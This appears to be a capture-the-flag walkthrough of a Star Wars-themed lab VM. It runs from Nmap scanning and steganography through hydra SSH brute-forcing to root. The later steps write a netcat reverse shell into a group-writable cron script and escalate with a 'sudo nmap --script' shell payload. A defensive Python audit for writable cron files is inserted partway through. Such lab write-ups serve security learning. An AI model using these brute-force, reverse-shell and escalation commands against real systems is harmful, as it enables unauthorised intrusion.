Let’s start with ARP scanning to discover our target’s IP address using the netdiscover command. There are many ARP scanning tools, but I always use Nmap and netdiscover.
Now that we have our target IP address, the next step is to scan the target machine with Nmap to find the open ports and the services running on them.
nmap -sV -sC 192.168.43.233
As we can see from this output, two ports are open: 22 and 80. We have a 22/SSH service as well as an 80/HTTP service on the server.
We open a web browser and explore the host IP address. We see two identical images and a comment ( Password you shall find ).
After reading the page source we found a base64 string, but it was not useful. Then I downloaded the image to our local system and started examining it for steganography. I used several different tools, but none of them gave me the right output.
I was stuck here, then I found a Ruby tool, zsteg ( detects stegano-hidden data in PNG & BMP ). You can install the tool with the following command.
sudo gem install zsteg
zsteg -a yoga.png
After extracting the hidden data from the image we found a password, but we still needed a username. For more details I started enumerating port 80 again, and by checking the robots.txt file we found a directory /r2d2,
but there was nothing useful there. Using the cewl tool I created a word-list with the following command.
sudo cewl http://192.168.43.233/r2d2 -vv -w word-pass.txt
I tried the wordlist as SSH usernames. After spending an hour we could not find any valid username, so I searched Google for ( StarWars wordlist ) and found a word-list ( you can download it from the wordlists link ) and tried again with the new user list.
sudo vi user.txt
hydra -L user.txt -p "babyYoda123" 192.168.43.233 ssh
After 217 tries hydra discovered a valid username and password, so now we log in to the SSH server.
Now I started enumerating the user’s home directory and found a .secrets directory with a note file. After reading note.txt I see a hint: Anakin is a cewl kid.
ls -lsa
cd .secrets/
ls
cat note.txt
I found a group named anakin with two members, Darth and skywalker.
cat /etc/group | grep anakin
Again I ran the cewl tool to create a new word-list, created a usernames file with these commands, and started SSH brute-forcing again.
sudo cewl http://192.168.43.233/r2d2 -vv -w word-pass.txt
ls
sudo echo -e "Darth\nskywalker" > /tmp/user.txt
sudo hydra -L /tmp/user.txt -P word-pass.txt ssh://192.168.43.233
As we can see, we again found a valid username and password. I switched to that user with the su ( switch user ) command, and again we found a .secrets directory with a note.txt file.
su skywalker
cd ~/
ls -lsa
cd .secrets/
cat note.txt
After reading note.txt we moved to Darth’s home directory, where I found a Python file. Reading it, we see a message that this file is run automatically every minute and that the anakin group has read-write permission on it.
cd /home/Darth/
cd .secrets/
cat evil.py
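A cron job that runs a script writable by a non-root group is exactly the kind of misconfiguration a hardening review should catch before anyone abuses it. The following is an added example, not code from the original write-up: a small Python audit that pulls the absolute paths out of a crontab and flags any file that is group- or world-writable. The crontab text, the backup.sh and python3 paths and the scratch directory tree are constructed for the demo; only the /home/Darth/.secrets/evil.py path comes from the page.

```python
import os, re, stat, tempfile

# Constructed crontab text for the demo; the box's real cron entry is not shown on the page.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
* * * * * root /usr/bin/python3 /home/Darth/.secrets/evil.py
0 3 * * * root /usr/local/sbin/backup.sh
"""

# An absolute path token: starts with '/', ends at whitespace or a shell separator.
ABS_PATH = re.compile(r"(?<!\S)(/[^\s;|&]+)")

def cron_paths(crontab_text):
    """Collect every absolute path mentioned on non-comment crontab lines."""
    paths = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            paths.extend(ABS_PATH.findall(line))
    return paths

def writable_by_non_owner(path):
    """True if the mode bits grant write access to the group or to others."""
    mode = os.stat(path).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(crontab_text, root="/"):
    """Return the cron-referenced files under root that a non-owner could modify."""
    flagged = []
    for p in cron_paths(crontab_text):
        full = os.path.join(root, p.lstrip("/"))
        if os.path.isfile(full) and writable_by_non_owner(full):
            flagged.append(p)
    return flagged

def demo():
    """Build a scratch tree matching SAMPLE_CRONTAB and audit it (no real system files touched)."""
    root = tempfile.mkdtemp()
    for rel, mode in (("home/Darth/.secrets/evil.py", 0o664),  # group-writable, as on the box
                      ("usr/local/sbin/backup.sh", 0o755),      # owner-only write
                      ("usr/bin/python3", 0o755)):             # constructed interpreter stub
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("# placeholder\n")
        os.chmod(full, mode)
    return audit(SAMPLE_CRONTAB, root)

if __name__ == "__main__":
    print(demo())  # ['/home/Darth/.secrets/evil.py']
```

Run against a real host, feed it the contents of /etc/crontab and the files under /etc/cron.d with root="/" and fix any flagged script with a chmod that removes group and world write.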
So I edited it to create a netcat reverse shell with these commands, but first we open a new console window and start a netcat listener on a port of our choice.
nc -lvp 77
echo -e 'import os\nos.system("nc 192.168.43.103 77 -e /bin/bash")' > evil.py
cat evil.py
After a minute we got a reverse connection from the target machine, and our user changed from skywalker to Darth.
sudo nc -lvp 77
sudo -l
Let’s run the sudo -l command to check whether this user can run any application with root privileges and without a password. We found that the Darth user can run the Nmap command. I had already read about Nmap privilege escalation, so without wasting time I ran the privilege escalation commands one by one.
var=$(mktemp)
echo 'os.execute("/bin/bash")' > $var
sudo nmap --script=$var
Now we have a root shell on the target machine. Let’s move to the root directory and read our final flag.
cd /root
ls
cat flag.txt